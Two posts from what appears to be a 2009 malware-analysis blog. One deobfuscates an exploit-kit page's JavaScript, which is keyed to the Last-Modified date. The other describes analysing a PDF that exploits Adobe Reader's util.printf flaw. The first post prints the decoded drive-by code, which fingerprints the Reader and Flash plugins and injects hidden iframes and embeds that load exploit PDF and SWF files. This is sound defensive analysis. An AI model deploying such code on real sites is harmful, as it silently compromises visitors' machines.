Sunday, November 15, 2009

Javascript lastmodified technique

Today I’ve found a website that told to have fragus botnet exploit kit.

After reviewing the page source code, it turns out to be using ‘lastmodified’ technique to make deobfuscation process harder. (Read here)

var jkmtu='',
uokyez=false,
jnuwx=String,
ehjnpy=jnuwx['f4r4o4mECPh4a9rPCLo4dLeL'.replace(/[LE49P]/g,'')],
btkz=window,
cflr=1,
bdfgou=btkz['eBvBajl0'.replace(/[0BGj2]/g,'')],
abhknx=document,
rwjzp=abhknx.lastModified,
chopqw=new Date(rwjzp).toUTCString(),
chopqw=chopqw.split(" "),
abmnxy=chopqw[4].split(":"),
acqtu="97"+abmnxy[2],
cmuwy=0,
...


By checking the HTTP Header request, we can replace the Last Modified Date into the variable for further analysis.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 15 Nov 2009 18:00:39 GMT
Content-Type: text/html; charset=WINDOWS-1251
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 12 Dec 2008 11:11:35 GMT

Replace the variable with the value of Last Modified Date and edit it to make spidermonkey js interpret the output;

window = print;
document = print;
var jkmtu='',
uokyez=false,
jnuwx=String,
ehjnpy=jnuwx['f4r4o4mECPh4a9rPCLo4dLeL'.replace(/[LE49P]/g,'')],
btkz=window,
cflr=1,
bdfgou=btkz['eBvBajl0'.replace(/[0BGj2]/g,'')],
abhknx=document,
rwjzp="Fri, 12 Dec 2008 11:11:35 GMT",
chopqw=new Date(rwjzp).toUTCString(),
chopqw=chopqw.split(" "),
abmnxy=chopqw[4].split(":"),
acqtu="97"+abmnxy[2],
cmuwy=0,
...
...
...
print(ajkq);
};

bcfknv();

And now we are ready to decode the JavaScript with spidermonkey js interpreter. Below are the output;
function cfmqsy(){}

function jloqy(){
var ijqstv=false;
if(navigator.plugins && navigator.plugins.length){
for(var bfntv=0;bfntv < navigator.plugins.length;bfntv++){
if(navigator.plugins[bfntv].description.indexOf('Adobe Acrobat')!=-1){
ijqstv=true;
break;
}

if(navigator.plugins[bfntv].description.indexOf('Adobe PDF')!=-1){
ijqstv=true;
break;
}
}
}

else if(window.ActiveXObject){
var kyzvnb=null;

try{
kyzvnb=new ActiveXObject('AcroPDF.PDF');
} catch(e){}

if(!kyzvnb){
try{
kyzvnb=new ActiveXObject('PDF.PdfCtrl');
}
catch(e){}
}

if(kyzvnb){ijqstv=true;}
}

if(ijqstv){
var ua=navigator.userAgent.toLowerCase();
if(ua.indexOf("firefox")!=-1){
var fjwx=document.createElement('embed');
fjwx.width='1';
fjwx.height='1';
fjwx.src='./egilrw.pdf';
fjwx.type='application/pdf';
document.body.appendChild(fjwx);
}
else{
var fjwx=document.createElement('iframe');
fjwx.setAttribute('src','. < strong>/egilrw.pdf < /strong>');
fjwx.setAttribute('width',10);
fjwx.setAttribute('height',10);
fjwx.setAttribute('style','display:none;');
document.body.appendChild(fjwx);
}

...
...
...

function opvy(){
var PlayerVersion=[0,0,0];
if(navigator.plugins && navigator.mimeTypes.length){
var x=navigator.plugins["Shockwave Flash"];

if(x && x.description){
PlayerVersion=x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split(".");
}
}

else{
try{
var fv=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
if(fv!=null){
PlayerVersion = fv.GetVariable("\$version").split(" ")[1].split(",");
}
} catch(e){abhmry();return;
}
}

var version1=PlayerVersion[0]!=null?parseInt(PlayerVersion[0]):0;
var version2=PlayerVersion[1]!=null?parseInt(PlayerVersion[1]):0;
var version3=PlayerVersion[2]!=null?parseInt(PlayerVersion[2]):0;

if(version1==9 && version3 < 124){
var ua=navigator.userAgent.toLowerCase();

if(ua.indexOf("firefox")!=-1){
var swfelement=document.createElement('embed');
document.body.appendChild(swfelement);
swfelement.width='1';
swfelement.height='1';
swfelement.src='. < strong>/manual.swf < /strong>';
swfelement.type='application/x-shockwave-flash';

...
...
...

}

jloqy();

From the code, we can identify that it tries to attack the vulnerabilities of Adobe Reader and Flash.

Downloaded the malicious PDF file that they’ll push when user visit the site. Gonna take a look at it later.

Saturday, November 14, 2009

Analyzing malicious PDF

Maybe some of you have read about malicious PDF and its danger if we neglect the possibility that it can harm you in some ways.

So today, let say you have caught some suspicious pdf file in wild and you don’t really know what to do.



The first and following questions might arise, “Does it contains malicious content?” and if yes, “What it’ll try to do and how?”.
Now the first thing that we normally do is to look into the PDF content structure and check for any hints. PDF do have a structure to form as a PDF Document. As in this case, we’re going to use the ‘cat’.



Alright, everything seems normal except the unreadable content between ’stream’ and ‘endstream’. We cannot determine whether this unreadable content is a malicious content or just a usual content for PDF document. However, we know that the unreadable content is encoded with FlateDecode as we search through the keyword ‘/Filter’. Most of normal PDF file usually have some of its content encoded with FlateDecode, and other encodings to name like JBIG2Decode and DCTDecode. FlateDecode usually can be decoded by using pdf-parser or inflater.



It turns out that the decoded content is a JavaScript code that is obfuscated with Base64 encoding. Until this part, PDF file has drawn some attention as it show some signs that the code might contains shellcode. Now we’ll dump the snippet JavaScript code into new text file for further analysis.

Next, we’ll use spidermonkey to interprete the JavaScript code and generate the output shellcode.



As we gone this far, we can surely identify that this PDF contains malicious content, and we also can identify what it try to do and how. From this shellcode, we can see that it try to exploit the vulnerability of util.printf (CVE-2008-2992) of Adobe Reader 8.1.2 and below. If succeeded, it will execute the payload attached within unescape() function.

Our next (and might be the last) attention is the payload itself. It is a UTF16/UCS2 character which can be converted to hex or into bin executable file. s2b.py can do the job for that.



From the hexdump output, we’re able to see that there is a URL of potential malware that will be triggered when the exploitation succeeded.